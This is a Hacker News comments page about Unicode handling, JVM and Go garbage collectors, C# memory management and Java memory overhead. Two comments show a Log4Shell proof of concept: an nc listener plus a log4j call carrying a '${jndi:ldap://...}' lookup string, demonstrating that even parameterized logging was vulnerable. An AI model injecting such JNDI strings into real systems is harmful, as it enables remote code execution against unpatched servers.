Hacker News | natanbc's comments

Only on older CPUs; Intel started fusing off AVX-512 in newer silicon batches (even within 12th gen)


Only in code points; it still has the problem GP mentions of ` + e = è being two code points (so two elements in UTF-32) but logically one character

https://manishearth.github.io/blog/2017/01/14/stop-ascribing...


This. It's pointless to have char32_t if you still need to pull in several megabytes of ICU to normalize the string first in order to handle characters spanning multiple code points. UTF-32 is arguably dangerous because of this: it's yet another attempt to replicate ASCII, but with Unicode. The only sane encoding out there is UTF-8, and that's it. If you have to always assume your string is not really splittable without a library, you won't do dangerous stuff such as assuming `wcslen(L"menù") == 4`.
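To make the combining-character point concrete, here is a small Java sketch (Java chosen only because the thread is largely about the JVM): the decomposed form is two code points until you normalize it, even though it renders as one character.

```java
import java.text.Normalizer;

public class Combining {
    public static void main(String[] args) {
        String decomposed = "e\u0300"; // 'e' + U+0300 combining grave accent
        // Two code points, even though it displays as one character:
        System.out.println(decomposed.codePointCount(0, decomposed.length())); // 2
        // NFC normalization folds it into the single code point U+00E8 ('è'):
        String nfc = Normalizer.normalize(decomposed, Normalizer.Form.NFC);
        System.out.println(nfc.codePointCount(0, nfc.length())); // 1
    }
}
```

Counting by code points gives a different answer for the same logical text depending on normalization form, which is exactly why fixed-width UTF-32 doesn't buy the safety it seems to promise.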


I posted this in reply to a sibling comment, but the "correct" way is still vulnerable

Start nc (nc -lp 1234) and run this

    org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")


Thanks, didn't realise that. So the issue is deeper than misuse of user input (I've edited my post).


The RCE works both ways; start nc (nc -lp 1234) and run this

    org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")


Well that’s just appalling.


> In a multithreaded program, a bump allocator requires locks. That kills their performance advantage.

Java uses per-thread pointer bump allocators[1]

> While Java does it as well, it doesn’t utilize this info to put objects on the stack.

Correct, but it does scalar replacement[2] which puts them in registers instead

> Why can Go run its GC concurrently and not Java? Because Go does not fix any pointers or move any objects in memory.

Most Java GCs are concurrent[3]; if you want super low pauses you can get those too[4][5]. Pointers can be fixed up while the application is running, using GC barriers.

[1]: https://shipilev.net/jvm/anatomy-quarks/4-tlab-allocation/

[2]: https://shipilev.net/jvm/anatomy-quarks/18-scalar-replacemen...

[3]: https://shipilev.net/jvm/anatomy-quarks/3-gc-design-and-paus...

[4]: https://wiki.openjdk.java.net/display/zgc/Main

[5]: https://wiki.openjdk.java.net/display/shenandoah


I agree. The author seems to know quite a bit about Go and GCs, but doesn't seem to have much experience with Java. As a Java performance engineer, it sounds like he is comparing Go to how he thinks Java works based on what he's read about it.


Additionally he doesn't seem to know that much about C#, which also has advanced GC, while allowing for C++ like memory management, if needed.


It's odd how most people who haven't used a VM with a GC are amazed by Go (no VM) and WASM (no GC), but still fail to understand that with a GC _AND_ a VM you can write something that doesn't crash even if you make a big mistake!

And they haven't even bothered to try it out!

To use anything other than JavaSE/C# on the server you really need very good arguments!


Or being amazed by Go's compile speed, when Turbo Pascal and Object Pascal compilers were already doing that in the 1980's, or finding WASM innovative when polyglot bytecodes with no GC also go back to the early 1980's, like Amsterdam Compiler Kit EM as one example among many.


The innovation in WASM is more about getting all the major players in the browser space to agree and support it as a first-class citizen in the web stack. That polyglot bytecodes existed in the early 1980's does nothing for the web.


What a perfect example, have you even tried Java?

I'm guessing you are coding for the client?

C++ arrogance is the problem here.

About the pipe dream of WASM there are 3 problems:

1) Compile times (both WASM and the browser)

2) If you thought Applets were insecure (btw they weren't), wait until the .js bindings (also a VM with GC...) that you are forced to go through to reach anything from WASM securely get attention!

3) If you build for the browser you have Intel, Nvidia, Microsoft and Google (do you work there? might explain things) to deal with on Windows. You DON'T want that... using C to build for Linux on ARM/RISC-V has to be one of your options, and then all the work you spent getting WASM to work is wasted (because you won't have the performance/electricity/money for the cycles you need in the long term).

Edit: Please don't replace Python (that you should probably never have touched) with Go...


1) No one was realistically compiling C++ or Python to Java though. WASM is not new tech as the other poster said — it’s people coming together to support one compile target that also works on the web, which itself is the crowning achievement.

2) Building a secure VM is easy. You only need to give it access to things it should have access to. If a VM has only math instructions, it’s not going to access the file system. My computer can’t poke my nose because there is literally no machine instruction for it.

Java did not build its VM that way. Instead, the JVM had full access to everything and individual functions were blacklisted within Java applications and this was enforced by Java code running in the same machine as the attacker’s code. Naturally every blacklist works like a sieve.


When I think about it, memory security is probably the weakest point of WASM, and probably also the reason nothing of value has come out of that initiative yet.

How does WASM protect memory?

Or maybe there is something valuable made in WASM and I don't know about it; Figma is, I think, but I'm not in the target audience.


Not to mention Turbo Pascal was compiling faster than Go, on a single-core, in-order 20 MHz PC...


With more advanced language features too.


Yep, Turbo Pascal 7.0 vs Go 1.0.


I just wrote some Go last weekend and the compile time was very slow. It reminded me of Scala. Anyway, I switched to Ruby and didn't have to deal with it any more. Turbo Pascal really was fast, but I don't see that in Go.


Scala and SBT are some of my biggest productivity killers. They murder my machine and take ages to compile.


> To use anything other than JavaSE/C# on the server you really need very good arguments!

Haha! Quoting this so you can't delete it.


Most programmers use PHP, Python, Ruby, Node.js which are all GC bytecode VMs.

What language are you imagining as an argument here?


C# makes it possible to do C (not C++) like memory management but it does not make it easy. Unsafe C# code is really, really, really unsafe, much more unsafe than equivalent C code, and does not compose well. It's improving, with Span/Memory, etc, but it remains an absolute last resort.


C and C++ memory management are alike; C# doesn't need reference-counted library types.

If you mean RAII, it can be approximated easily enough with IDisposable, using blocks, and Roslyn analysers that raise errors when usings are forgotten.

And yes, manual memory management should be a last resort, backed by profiler data.


I do mean RAII, which is fundamental to C++. Memory management without it is not "C++ like".

IDisposable is not a substitute for RAII, and C# has nothing that can manage ownership in equivalent ways as it lacks deterministic destruction. Implementing, for example, a data structure based on unmanaged memory in C# in such a way that it can be safely used by code outside the library without undermining the safety of the language (i.e. without introducing the possibility of programming errors outside the data structure implementation causing leaks or memory corruption) is an exercise in discipline and requires a thorough understanding of the runtime - eg. knowing that an object can be garbage collected while a method on it is executing. I know this because I've done it (as a last resort after extensive profiling and production use of various optimised, managed versions of the library).


Maybe you should further explore the Marshal interop services and the Span-related improvements.

IDisposable is definitely an alternative when coupled with Roslyn analysis or SonarQube.

As if doing it in C++ doesn't require the same level of knowledge; worse, actually, as it also requires ISO C++ mastery and a good knowledge of how each compiler being used handles implementation-defined and undefined behaviour.

Also, unless static analysis is used, RAII can get the ownership wrong too, especially with use-after-move errors or smart pointers incorrectly passed as arguments.


I used Spans extensively. They help (mostly by providing efficient bounds checking), but not much. The main problem, as I mentioned initially, is the composability of this sort of code.

I wasn't trying to give some kind of defence of C++ here, just pointing out the dissimilarities to C#. This particular piece of code would have been far easier in C++ and RAII would have been a huge help, but the system as a whole would have been an utter nightmare in C++ (which I know because I've worked on multiple similar systems in C++).


Sure, but I am of the opinion it does compose, if one accepts that it isn't the same as writing C++ in C#; not trying to downplay your experience on the matter.

For example, here are the Roslyn analysers for a more RAII like experience with IDisposable,

https://github.com/DotNetAnalyzers/IDisposableAnalyzers

Turn "DISP004-Don't ignore created IDisposable." into a compiler error and you have your region-allocated, RAII-like experience.

And, moving the goalposts a bit: for those scenarios where C# completely fails to provide a useful solution, we can rewrite just that module in C++ (preferably C++/CLI when only Windows matters), and have the best of both languages.


There's also ref which is almost like pointers and safe. Span/Memory do not remain an absolute last resort, they are becoming the standard way for string formatting/parsing/(de)serialization and IO.


I didn't say Span/Memory are a last resort, I said C style memory management (AllocHGlobal/Free), despite being somewhat improved by Span/Memory, remains an absolute last resort. Span/Memory aren't primarily aimed at handling unmanaged memory, though they're useful for it.


Of course C-style memory management is a last resort; 99% of devs don't need it, and the 1% that actually need it had better learn to use VTune.


why is it more unsafe than equivalent C code? I always thought it's simply a way to enable C-like real pointers/native memory ...


"Scalar replacement" explodes the object into its class member variables and does not construct a class object at all. That does result in the exact same `sub %esp` (that Go would do for any struct), but it is restricted to only working if every single usage of that class type is fully inlined and the class is never passed anywhere that needs it in its object form.

It's worse than what Go has. Go can stack-allocate any struct and still pass pointers to it to non-inlined functions.
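A hedged illustration of the restriction described above (the names are made up, and whether scalar replacement actually fires depends on the JIT's inlining decisions at runtime):

```java
// If dist2 and the Point constructor are fully inlined and p never escapes,
// HotSpot's escape analysis may scalar-replace p, keeping x and y in
// registers with no heap allocation at all. Pass p to any non-inlined
// method, though, and the object must be materialized on the heap.
final class Point {
    final int x, y;
    Point(int x, int y) { this.x = x; this.y = y; }
}

public class ScalarReplacementDemo {
    static long dist2(int x, int y) {
        Point p = new Point(x, y); // candidate for scalar replacement
        return (long) p.x * p.x + (long) p.y * p.y;
    }

    public static void main(String[] args) {
        System.out.println(dist2(3, 4)); // 25
    }
}
```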


Scalar replacement does not work even in very trivial cases: https://pkolaczk.github.io/overhead-of-optional/

In all those cases, Optionals were inlined, didn't escape, yet they haven't been properly optimized out.


Did you understand why?


I don't know the exact reason here, but from my experience JVMs don't seem to perform optimisations as deep as static compilers. You can see the compiler not only missed scalar replacement here, but also didn't use a conditional move to avoid branching, nor did it perform any loop unrolling. Maybe it is because JITs are a lot more constrained by time and resources.


It'd be worth doing a deep dive into this - you can look at the compiler's intermediate representation to understand why it didn't make an optimisation. There may be something trivial getting in the way.


Scalar replacement (as currently implemented in Java) does not work in real-world programs.

Well-written code does not need it. Poorly written code cannot trigger it, because the JIT is too dumb and isn't getting better.

There is no sane test to determine whether a piece of code will be inlined in Java. In practice anything more complex than a byte array is unlikely to be inlined. Even built-in ByteBuffers aren't! Meanwhile the Go compiler treats Go slices just as nicely as arrays, or better.


The JIT is getting better. Major escape analysis upgrades are a big part of where Graal (a drop-in replacement for the HotSpot JIT) gets its performance boosts. EA definitely does work well there because Truffle depends on escape analysis and scalar replacement very heavily. GraalVM CE is better than regular HotSpot at doing it and GraalVM EE is even better again.


Graal effort is over 10 years old.

jaotc (Graal's sole mainstreamed part) was recently removed from OpenJDK in release 17, and Oracle says[1] that they are "considering the possibility of using C2 for ahead-of-time"

1: https://mail.openjdk.java.net/pipermail/discuss/2020-Novembe...


It’s almost as if graal and openjdk are separate projects with different use cases. Also, they are not competing (in the usual meaning) since both are developed by Oracle.


Which JIT? There are plenty of them to choose from across Java implementations.


ZGC[4] in particular has me excited, enough so to want to pick up a JVM language.


ZGC and Shenandoah can be slower than G1; they are not silver bullets. The fact that there are 4-5 GCs says it all: no single GC is better than all the others.

It really depends on the workload.


Indeed. It is strange that no official JDK document puts the pros/cons of the GCs packaged with standard JDKs in some kind of easy-to-read table/matrix.


Well, unless latency is explicitly a problem with the default (G1) GC, it probably should not be changed to begin with. It is a beast of a GC with a very good balance between throughput and latency. And if latency is problematic, the first thing to try should be the single G1 knob one should set (unless they really know what they are doing): the target pause time. Throughput and latency are fundamentally opposing goals.
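For reference, the knob in question looks like this on the command line (the value is purely illustrative, not a recommendation; G1 has been the default collector since JDK 9, so the first flag is usually redundant):

```shell
# Ask G1 to aim for max pauses of ~50 ms; it's a goal, not a guarantee
java -XX:+UseG1GC -XX:MaxGCPauseMillis=50 -jar app.jar
```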

G1 by default has low enough pauses as well, but it does increase with the speed of garbage creation. But it handles even ridiculously high throughputs with graceful degradation of pause times.

Here is a really great blog on various aspects of modern GCs (and don’t forget that we are at Java 17, with small but significant GC updates in each version): https://jet-start.sh/blog/2020/06/23/jdk-gc-benchmarks-remat...


Right, that is all good. But as I said, how difficult would it be for an official document to put out a comparison table? A comparison across latency/throughput/heap size/cost (memory/CPU) should be enough for developers to choose the right GC for their applications.


ZGC is already available, since JDK 15, September 2020. =)

https://wiki.openjdk.java.net/display/zgc/Main#Main-ChangeLo...


Max pause times of 0.5ms is what got me really interested.

It feels like a huge trade-off of GCs is almost completely gone.

https://malloc.se/blog/zgc-jdk16


> It feels like a huge trade-off of GCs is almost completely gone.

FWIW the tradeoff of low latency GC is usually paid in throughput.

That is definitely the case for Go, which can lag very much behind allocations (so if your allocation pattern is bad enough the heap will keep growing despite the live heap being stable, because the GC is unable to clear the dead heap fast enough for the new allocations).


throughput can be fixed by adding compute. latency cannot. always optimize for latency with gc.

and no, the heap will not keep growing in golang. it'll force threads to help with GC if it's falling behind, thereby reducing the rate of allocations and speeding up the collection.


Random Go dev suddenly more of an expert than the literal best-in-class GC experts that have been working on G1GC, ZGC, Shenandoah, Parallel, ConcMarkSweep and others.

GCs are a matter of tradeoffs. Always optimizing for latency is Go's solution, but there are reasons for everything. It's the very reason why the JVM has so many knobs. Yes, it requires a PhD to know what to tune, but there are many parameters for the thousands of different situations that can arise.


*rolls eyes* I've tuned java's GC for highly available and massive-throughput systems.

pretty familiar with the trade-offs. java's problem isn't GC (in general); its problem is memory layout and the fact it can't avoid generating a metric shit ton of garbage.

G1GC was a good improvement and I stopped paying attention at that point because I no longer had to deal with its problems (left the ecosystem).

I'm not asserting java hasn't improved or that its GC implementations aren't modern marvels. fundamentally they're just a self inflicted wound.

golang wouldn't benefit anywhere near as much as java has from these implementations, because guess what... they've attempted GCs that operate under similar assumptions (young allocations, compacting patterns, etc.) and failed to make an improvement that just increasing the heap size knob on the current GC wouldn't match.


> it can't avoid generating a metric shit ton of garbage.

IMHO this is an often-overlooked aspect of Java and I get flak for pointing out that Java programs are often full of defensive copying because the Java style encourages it. The JDK is very trashy and highly biased against reusing objects or doing anything in-place without creating garbage. You can't, for example, parse an integer out of the middle of a string.
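For what it's worth, the classic version of that example forces a throwaway substring just to parse; JDK 9 did later add a copy-free overload, so this particular pain point has softened on newer JDKs (string contents here are made up):

```java
public class MidParse {
    public static void main(String[] args) {
        String s = "order-12345-east";
        // Traditional: substring() allocates a garbage String just to parse:
        int a = Integer.parseInt(s.substring(6, 11));
        // JDK 9+: parse a region of the CharSequence directly, no copy:
        int b = Integer.parseInt(s, 6, 11, 10);
        System.out.println(a + " " + b); // 12345 12345
    }
}
```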

15 years ago when I wrote a lot more Java, I could get away with avoiding JDK libraries to write tight and small Java code (yeah, omg, mutable non-private fields). That was how I got my AVR microcontroller emulator to beat its C competitors. Nowadays if you write that kind of code you get a beatdown.

JVMs work really hard to deal with trashy Java code. Generics make everything worse, too; more hidden casts and adapter methods, etc.


Only in some kinds of apps, like web servers where all the heavy lifting is being done by the database anyway.

Consider a compiler. It's not infinitely scalable to multiple cores. It may not even be multi-threaded at all. It also doesn't care about pause times - for that you want Parallel GC.


depends on the compiler and language. golang seems to counter your position quite handily, having one of the fastest compile times while being highly concurrent.

if your application is so simple it doesn't use concurrency then 99% of the time you can completely remove the need for GC by preallocating slabs.


The Go compiler is fast because it doesn't do very much, not because Go's GC is good for throughput oriented jobs.

Go has repeatedly tied itself in knots over the years because they have a goal of not making the compiler slower, yet, the GC needs of the compiler are diametrically opposed to the needs of the HTTP servers Go is normally used for.

https://go.dev/blog/ismmkeynote

"As you can see if you have ROC on and not a lot of sharing, things actually scale quite nicely. If you don’t have ROC on it wasn’t nearly as good ... At that point there was a lot of concern about our compiler and we could not slow down our compilers. Unfortunately the compilers were exactly the programs that ROC did not do well at. We were seeing 30, 40, 50% and more slowdowns and that was unacceptable. Go is proud of how fast its compiler is."


For a compiler, the GC strategy that makes most sense is to never deallocate. The compiler is going to die shortly. No need to do the bookkeeping of figuring out how to deallocate before that happens.
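Java can actually express that strategy directly: Epsilon GC allocates and never reclaims, which fits short-lived batch tools like compilers. The flags are real; the class name is made up:

```shell
# Epsilon (JDK 11+): allocation-only, no collection; the process just exits
java -XX:+UnlockExperimentalVMOptions -XX:+UseEpsilonGC -Xmx8g MyCompiler
```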


There's still a memory tradeoff, some due to GC, some due to Java (lots of runtime reflection...). Guessing 2-4x.


This is a bit of a tangent, but you can get into situations where Java's memory-overhead becomes pretty untenable. I was in a situation of having to keep track of ~1 billion short strings of a median length of maybe 7 characters.

In terms of just data, that should clock in at about 10 GB; in practice it was closer to 24 GB. I tried going with just byte[] instances instead, which didn't help a lot. Using large byte[] instances and indexing into those doesn't help as much as you'd think, because they get sliced up into small objects behind the scenes.

I ended up memory mapping blocks of memory and basically implementing my own append-only allocator.
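A minimal sketch of that kind of append-only allocator in Java (all names are hypothetical; the real implementation presumably memory-maps files rather than using a single direct buffer):

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;

// Append-only string arena: strings are encoded into one large off-heap
// buffer and referenced by (offset, length) packed into a long, so the GC
// never sees a billion small String/byte[] objects.
public class StringArena {
    private final ByteBuffer buf;

    StringArena(int capacity) { buf = ByteBuffer.allocateDirect(capacity); }

    long append(String s) {
        byte[] bytes = s.getBytes(StandardCharsets.UTF_8);
        int offset = buf.position();
        buf.put(bytes);
        return ((long) offset << 32) | bytes.length; // pack offset + length
    }

    String get(long handle) {
        int offset = (int) (handle >>> 32);
        byte[] out = new byte[(int) handle];     // low 32 bits = length
        ByteBuffer view = buf.duplicate();       // independent read position
        view.position(offset);
        view.get(out);
        return new String(out, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        StringArena arena = new StringArena(1 << 20);
        long h = arena.append("hello");
        System.out.println(arena.get(h)); // hello
    }
}
```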


FWIW, this would probably present a challenge in most (all?) languages.

For example in libc++ due to SSO an std::string has a minimum size of 24 bytes.

For a billion strings of less than 15 chars (+ the null byte), that gets you to 24 GB, and that's optimistically assuming each string is allocated in place.

I doubt heap allocated char* would do much better either. Just having a billion 8 byte pointers eats a lot of memory. You’d really need some sort of string packing scheme similar to what you did in Java.


It's a lot easier to build custom allocators in C++ though.

For one, Java has a maximum mmap size of 2 GB, and as a cherry on top of that turd, you have no control over their lifecycle. The language is very clearly not designed for this type of work, and if you try to make it do it anyway, it fights you every step of the way.


It has nothing to do with the language but with the API / VM capabilities.

Both those restrictions are fixed; granted, this is not yet in the official API, it's an incubation module (the equivalent of Python's from __future__).

https://docs.oracle.com/en/java/javase/17/docs/api/jdk.incub...


The foreign memory API which is currently incubating should help with most of these limitations: https://openjdk.java.net/jeps/419


Right - specifically they invented a way to make closing an mmapped segment safe and fast. The reason you can't officially (without private APIs) unmap something in current Java is because if you did then other threads would segfault, and "no segfaults" is kind a defining characteristic of Java. The new API fixes this using more VM magic, so closing a mapping from one thread will cause other threads to throw exceptions, but this is done without sacrificing performance (it doesn't require checking a status every time you read from memory).


The Lilliput project aims to address this: https://wiki.openjdk.java.net/display/lilliput


I would never write something like this in java, but to be fair, a program shouldn't be written like this in the first place. If you "need" a billion strings in memory and you didn't design for that with something that would scale better, you messed up a long time ago.


Huh, I didn't really have a problem solving the problem as it came up. Like many scaling problems, it wasn't a problem until it was. Then I fixed it. Now I have a solution that can deal with ten times as many strings as before. If I grow out of that one, I'll come up with a better design.

I could have gotten 10 times as much hardware instead, but that would be an incredible waste of money compared to just spending a few days writing more hardware-efficient code.


I have addressed similar problems using a typed array of contiguous memory and another array of lengths.


I did try exactly that, but the GC overhead was still prohibitively high for my use case, in part because big arrays in practice get composed from shorter non-contiguous arrays to make garbage collection even remotely possible.


Hmmm, if the typed array only contains primitives, the GC isn't looking inside the array. If the thing pointed to can never contain a pointer, it won't need to be scanned.


A factor of 2.4 is extremely unlikely to be what makes the difference between a program being viable and not. You have to be in an extremely fine-tuned situation for that to make the difference, and unless your usage level is unusually static it's probably only going to make the difference for a few weeks or months.


So for some context, I'm running a search engine on consumer hardware. Coaxing power out of limited hardware is sort of my bread and butter. How many of these strings I can keep in memory limits how many documents I can index. Doubling that number is quite significant.

This number is orthogonal to how many searches I can serve, that is already a solved problem (through similar craftiness). Multiple searches per second sustained load is fine. The search engine has held up to the hacker news front page, which is something many supposedly non-interactive sites struggle with.

This is a non-profit operation, so unless someone just decides to pay me a months salary or two, I'm not able to meaningfully increase the hardware. I'm stuck with what I've got and will make the most of it.


The time of someone who can do that kind of crafty tuning is almost certainly worth more than the hardware. If nothing else, I'd think having you do a week or two of consultancy and buy more hardware with the proceeds would be more efficient in terms of getting things done. (I appreciate that nonprofits have a lot of particular constraints that mean that that's probably not a practical way forward).


Playing devil's advocate here: a use case might already be hitting the maximum per-server RAM.

A factor of 2.4 might mean 2.4 times more hardware. You might need 240 servers instead of 100.


Sure. And? Everything that you need to do to manage 240 servers, you need to do to manage 100 servers. Like I said, if you're in the scaling stage then you'll be getting to 240 in a few months either way, so you need to be ready for it. 2.4x higher operating expenses matter eventually, when you're a mature organisation, but if the software is under active development you almost certainly have higher priorities.


Also, throughput. But latency and throughput are almost universally opposite ends of the same axis — that’s why it’s great that Java allows for choosing a GC implementation.


you can fix throughput problems by adding compute resources, you can't fix latency issues. I'll always pick a GC that optimizes latency over throughput. its easier to maintain the software.


The GC memory overhead affects all languages with a GC more advanced than refcounting. It certainly does affect Go as well.


It does for multi-codepoint characters (such as the rainbow flag): https://play.rust-lang.org/?version=stable&mode=debug&editio...

Elixir gets it right: https://replit.com/@natanbc/reverse
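For comparison, the JDK can do a grapheme-aware reverse too, via BreakIterator. A sketch (how well it handles newer multi-codepoint emoji sequences depends on the Unicode data shipped with your JDK):

```java
import java.text.BreakIterator;

public class GraphemeReverse {
    // Reverse a string by user-perceived characters, not code units:
    // walk the grapheme boundaries backwards, copying each cluster intact.
    static String reverse(String s) {
        BreakIterator it = BreakIterator.getCharacterInstance();
        it.setText(s);
        StringBuilder out = new StringBuilder(s.length());
        int end = it.last();
        for (int start = it.previous(); start != BreakIterator.DONE;
                end = start, start = it.previous()) {
            out.append(s, start, end); // one grapheme cluster, unreversed
        }
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(reverse("abc"));      // cba
        // 'e' + combining accent stays glued to its base:
        System.out.println(reverse("e\u0300x")); // x followed by è (decomposed)
    }
}
```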


Yeah, another commenter mentioned grapheme-clusters, though apparently there's a readily available crate that adds support: https://stackoverflow.com/questions/58770462/how-to-iterate-...

According to this they added it to the standard library at one point but then broke it back out because the lookup tables were too large


